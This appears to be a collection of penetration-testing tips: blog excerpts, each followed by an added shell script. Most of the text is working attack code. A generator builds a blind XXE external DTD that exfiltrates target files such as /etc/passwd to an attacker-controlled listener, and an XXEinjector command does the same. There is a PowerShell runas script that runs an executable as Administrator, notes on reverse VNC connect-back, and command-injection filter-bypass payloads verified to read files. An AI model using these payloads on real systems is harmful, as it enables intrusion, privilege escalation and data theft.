sudo ruby XXEinjector.rb --host=127.0.0.1 --file=req.txt --path=/etc/passwd --httpport=800 --proxy=127.0.0.1:8080 --urlencode --ftpport=2221 --phpfilter --verbose

XXE attacks have been part of the OWASP Top 10 since 2017 and therefore deserve close attention. One type of XXE attack that is often overlooked is blind XXE, which can allow reading files, scanning ports internally or, in rare cases, even remote code execution. […]
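As an added example (not XXEinjector's code, nor the request file from the post), the two files behind a blind, out-of-band XXE read that a tool like XXEinjector generates for you. The attacker host and port are placeholders for a listener you control; the target file, DTD name and output directory are chosen here. The "php" mode mirrors what --phpfilter does: wrapping the file in php://filter so a multi-line file travels as one base64 token in the URL.

```shell
#!/bin/sh
# Added example: hand-built blind (out-of-band) XXE payloads. Assumes the
# target's XML parser resolves external entities and can reach the attacker.

# External DTD served by the attacker. "%file" loads the target file; "%eval"
# declares a third entity whose SYSTEM URL embeds that content, so resolving
# "%exfil" makes the parser send the file to the attacker. "&#x25;" is a
# percent sign, which cannot be written literally inside an entity value.
# With "php" as 4th argument the file is read through php://filter so that a
# multi-line file survives as a single base64 token in the URL.
oob_dtd() {   # $1 = attacker host, $2 = attacker port, $3 = file on target, $4 = "php" or empty
  if [ "$4" = "php" ]; then
    printf '<!ENTITY %% file SYSTEM "php://filter/convert.base64-encode/resource=%s">\n' "$3"
  else
    printf '<!ENTITY %% file SYSTEM "file://%s">\n' "$3"
  fi
  printf "<!ENTITY %% eval \"<!ENTITY &#x25; exfil SYSTEM 'http://%s:%s/?d=%%file;'>\">\n" "$1" "$2"
  printf '%%eval;\n%%exfil;\n'
}

# Request body sent to the vulnerable endpoint. It only references the
# attacker's DTD, so nothing about the file has to be reflected in the
# response (hence "blind"): the data leaves in the DTD fetch that follows.
oob_request() {   # $1 = attacker host, $2 = attacker port, $3 = DTD file name
  printf '<?xml version="1.0"?>\n'
  printf '<!DOCTYPE data [\n  <!ENTITY %% dtd SYSTEM "http://%s:%s/%s">\n  %%dtd;\n]>\n' "$1" "$2" "$3"
  printf '<data>blind</data>\n'
}

# Write both files into a directory ready to serve, e.g. with
#   python3 -m http.server <port>        (run inside that directory)
# and watch the access log for "GET /?d=<file contents>".
write_payloads() {   # $1 = output dir, $2 = host, $3 = port, $4 = target file, $5 = "php" or empty
  oob_dtd "$2" "$3" "$4" "$5" > "$1/ev.dtd"
  oob_request "$2" "$3" ev.dtd > "$1/request.xml"
}
```

Plain file:// exfiltration over HTTP breaks on newlines and other characters that are illegal in a URL, which is why XXEinjector also offers an FTP channel (--ftpport) and the PHP filter wrapper for such files.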



Repetitive tasks can normally be automated with simple methods. Yet in penetration testing, many things are still done by hand. Here are some quick tricks for automating some of the most common penetration-testing tasks. The line below opens each IP and port of all web servers (for example as determined by an nmap scan) in the iceweasel […]
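As an added example (not the one-liner from the post), a script that turns nmap's greppable output (-oG) into a list of web URLs and opens each one in a browser. The scan output embedded below is constructed; the browser command is taken from $BROWSER and defaults to iceweasel as in the post.

```shell
#!/bin/sh
# Added example: open every web server found by nmap in a browser.

# Constructed -oG output: two hosts, tab-separated fields as nmap writes them.
# Port entries have the form port/state/proto/owner/service/rpc/version/.
SAMPLE_GNMAP=$(printf 'Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/open/tcp//ssl|https///\tIgnored State: closed (997)\nHost: 10.0.0.9 ()\tPorts: 8080/open/tcp//http-proxy///, 3306/open/tcp//mysql///, 8443/filtered/tcp//https-alt///\n')

# Read -oG text on stdin, print one URL per open HTTP-like port.
web_urls_from_gnmap() {
  awk -F'\t' '
    /^Host: / {
      split($1, h, " "); ip = h[2]
      for (i = 2; i <= NF; i++) {
        if ($i !~ /^Ports: /) continue
        sub(/^Ports: /, "", $i)
        n = split($i, entry, /, /)
        for (j = 1; j <= n; j++) {
          split(entry[j], f, "/")
          if (f[2] != "open") continue                 # skip closed/filtered ports
          if (f[5] ~ /https/ || f[1] == 443) scheme = "https"
          else if (f[5] ~ /http/)            scheme = "http"
          else continue                                # not a web service
          printf "%s://%s:%s\n", scheme, ip, f[1]
        }
      }
    }'
}

# Open every URL in the browser, one process per URL, without blocking.
# Usage: nmap -oG - -p 80,443,8080,8443 10.0.0.0/24 | open_web_urls
open_web_urls() {
  web_urls_from_gnmap | while read -r url; do
    "${BROWSER:-iceweasel}" "$url" >/dev/null 2>&1 &
  done
}
```

Feeding the sample through the parser gives http://10.0.0.5:80, https://10.0.0.5:443 and http://10.0.0.9:8080; the filtered 8443 and the non-web ports are dropped, so you only open pages that actually answered.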



The methods and scripts below may be used for transferring files. TFTP script (bash): replace the directory with one of your choice and run this bash script to set up a working TFTP server and get guidance on how to download a file from it. NB: the chosen directory will be exposed, so anyone can download the files available in […]
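As an added example (not the TFTP script from the post), another transfer method for the case where the only channel is text, such as a shell that cannot carry binary data: the file is packed into numbered base64 chunks with a hash, pasted across, and verified on the receiving side. File paths are placeholders and the payload file is constructed here.

```shell
#!/bin/sh
# Added example: file transfer over a text-only channel with an integrity check.

# Sender side: one SHA-256 line, then numbered base64 chunks. The numbers let
# the receiver re-order and de-duplicate chunks that were pasted twice.
pack_file() {   # $1 = file to send; packed text on stdout
  sha256sum "$1" | awk '{ print "SHA256 " $1 }'
  base64 "$1" | tr -d '\n' | fold -w 64 | awk '{ printf "%06d %s\n", NR, $0 }'
}

# Receiver side: rebuild $2 from the packed text in $1. Returns non-zero if
# the decoded data does not match the sender's hash (missing, corrupted or
# truncated chunks).
unpack_file() {   # $1 = packed text, $2 = destination
  expected=$(awk '/^SHA256 /{ print $2; exit }' "$1")
  grep -E '^[0-9]{6} ' "$1" | sort -u | awk '{ print $2 }' | base64 -d > "$2" || return 1
  actual=$(sha256sum "$2" | awk '{ print $1 }')
  [ -n "$expected" ] && [ "$actual" = "$expected" ]
}

# Constructed round trip: a 5000-byte random file, packed, "pasted" twice (so
# every chunk is duplicated, as happens when a paste is retried), then
# unpacked and compared with the original.
WORK=$(mktemp -d)
head -c 5000 /dev/urandom > "$WORK/payload.bin"
pack_file "$WORK/payload.bin" > "$WORK/packed.txt"
cat "$WORK/packed.txt" "$WORK/packed.txt" > "$WORK/pasted.txt"
roundtrip_ok() {
  unpack_file "$WORK/pasted.txt" "$WORK/copy.bin" && cmp -s "$WORK/payload.bin" "$WORK/copy.bin"
}
```

On the receiving shell the packed text is typically captured with cat > packed.txt followed by the paste and Ctrl-D; a mismatch from unpack_file tells you which transfer to repeat before you run anything from the copy.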



It is often handy to turn a plain shell into a GUI session. For example, sometimes the "run as administrator" option is enabled in Windows with credentials already entered. To exploit this you would often need that GUI. One way of getting the GUI is to get a VNC service onto the target machine and instruct it to connect back to your attacking […]



To prevent privilege escalation, the runas command is often unavailable in Windows shells. To bypass this, the following may be pasted into a PowerShell or Windows cmd prompt to run a chosen command (the first line creates runas.ps1, the others append to it):

echo $secpasswd = ConvertTo-SecureString "PASSWORD-HERE" -AsPlainText -Force > c:\Windows\temp\runas.ps1
echo $mycreds = New-Object System.Management.Automation.PSCredential ("Administrator", $secpasswd) >> c:\Windows\temp\runas.ps1
echo $computer = "NAME-OF-COMPUTER-HERE" >> c:\Windows\temp\runas.ps1
echo '[System.Diagnostics.Process]::Start("C:\Windows\temp\FILE-TO-RUN.exe","",$mycreds.Username, $mycreds.Password, […]



Enumerating information with pure Windows commands often requires administrator access. For example, it is normally not possible to find out which service is listening on a specific port with netstat -b unless you are an administrator. To overcome this, you can fetch the listening-port information and the process information separately and then match the process IDs of both. Then, by searching the output for "localport" […]
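As an added example (not the post's own commands), the matching step done offline: the output of netstat -ano and of tasklist /fo csv /nh, both of which run as an ordinary user, is copied off the Windows box and joined on the PID on the attacking machine. Both inputs below are constructed; the process names and PIDs are illustrative.

```shell
#!/bin/sh
# Added example: join netstat -ano with tasklist output to get the process
# behind each listening port without the admin-only netstat -b.

WORK=$(mktemp -d)

# Constructed `netstat -ano` output as copied from the target.
cat > "$WORK/netstat.txt" <<'EOF'
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       892
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       1204
  TCP    [::]:1433              [::]:0                 LISTENING       2300
  TCP    10.0.0.7:49712         10.0.0.1:445           ESTABLISHED     4
  UDP    0.0.0.0:123            *:*                                    1052
EOF

# Constructed `tasklist /fo csv /nh` output (no header, one process per line).
cat > "$WORK/tasklist.csv" <<'EOF'
"System Idle Process","0","Services","0","8 K"
"System","4","Services","0","148 K"
"svchost.exe","892","Services","0","10,232 K"
"svchost.exe","1052","Services","0","6,120 K"
"httpd.exe","1204","Services","0","12,004 K"
"sqlservr.exe","2300","Services","0","210,556 K"
EOF

# Print "proto/port <tab> pid <tab> image" for every listening socket.
# Handles CRLF line endings and IPv6 "[::]:port" addresses.
listening_services() {   # $1 = tasklist csv, $2 = netstat output
  awk '
    FNR == NR {                                  # first file: pid -> image map
      sub(/\r$/, ""); gsub(/"/, ""); split($0, f, ",")
      image[f[2]] = f[1]; next
    }
    { sub(/\r$/, "") }
    $1 == "TCP" && $4 == "LISTENING" { emit("tcp", $2, $5) }
    $1 == "UDP"                      { emit("udp", $2, $4) }
    function emit(proto, addr, pid,    port) {
      port = addr; sub(/.*:/, "", port)          # text after the last colon
      printf "%s/%s\t%s\t%s\n", proto, port, pid, (pid in image ? image[pid] : "?")
    }
  ' "$1" "$2"
}

# Image name behind one TCP/UDP port, or nothing if it is not listening.
port_owner() {   # $1 = tasklist csv, $2 = netstat output, $3 = port
  listening_services "$1" "$2" | awk -F'\t' -v p="$3" '$1 ~ ("/" p "$") { print $3 }'
}
```

A PID with no tasklist entry is printed as "?", which happens when the process exited between the two commands; re-run both and diff the results rather than trusting a single snapshot.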



Imagine the following scenario: you have gained access to a highly privileged user (not root) on a Linux server and would like to escalate to root. There is no sudo command or other escalation command available. What do you do? Here are two one-liners for escalating to root in Linux. Compiling a binary, setting the setuid […]



Sometimes there are restrictions in place on writing or executing commands or files. For example, you may have a limited shell, or you may have found a command-injection vulnerability but filters restrict which commands or characters you can actually run. Here are some alternatives for running commands that may help bypass such filters: The following […]
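As an added example (not the post's list), several spellings of the same command that get past common injection filters, checked against constructed blacklists so you can see which variant survives which rule. It assumes the injected string ends up in bash -c "<input>"; the file being read is created here as a stand-in for the real target.

```shell
#!/bin/sh
# Added example: command-injection filter bypasses, each verified to still run.

TARGET="${TMPDIR:-/tmp}/injection-demo-$$.txt"     # stand-in for the file to read
printf 'flag{constructed-example}\n' > "$TARGET"
trap 'rm -f "$TARGET"' EXIT

# Payload variants, kept as literal strings; the target shell expands them.
P_PLAIN="cat $TARGET"
P_IFS="cat\${IFS}$TARGET"                        # space banned: $IFS expands to whitespace
P_BRACE="{cat,$TARGET}"                          # space banned: brace expansion supplies the separator
P_QUOTES="c'a't $TARGET"                         # "cat" banned: quotes split the word
P_VAR="x=ca;\${x}t $TARGET"                      # "cat" banned: assembled from a variable
P_OCTAL="\$(printf '\\143\\141\\164') $TARGET"   # "cat" banned: name built from octal escapes
P_B64="echo $(printf 'cat %s' "$TARGET" | base64 | tr -d '\n') | base64 -d | bash"   # command appears only encoded

# Execute a payload the way the vulnerable `bash -c "$input"` would.
run_payload() { bash -c "$1"; }

# Constructed filter: succeeds (payload blocked) when the payload matches the
# banned extended regex.
is_blocked() { printf '%s' "$1" | grep -Eq -- "$2"; }

# Names of the variants that pass a filter and still read the file.
surviving_payloads() {   # $1 = extended regex of banned text
  for name in P_PLAIN P_IFS P_BRACE P_QUOTES P_VAR P_OCTAL P_B64; do
    eval "payload=\$$name"
    if ! is_blocked "$payload" "$1" && [ "$(run_payload "$payload")" = "$(cat "$TARGET")" ]; then
      printf '%s\n' "$name"
    fi
  done
}
```

Running surviving_payloads ' ' lists the variants without spaces (P_IFS, P_BRACE); surviving_payloads 'cat' lists those that never spell the command name (P_QUOTES, P_VAR, P_OCTAL). The brace form needs bash on the target; $IFS and the octal printf also work under a POSIX sh.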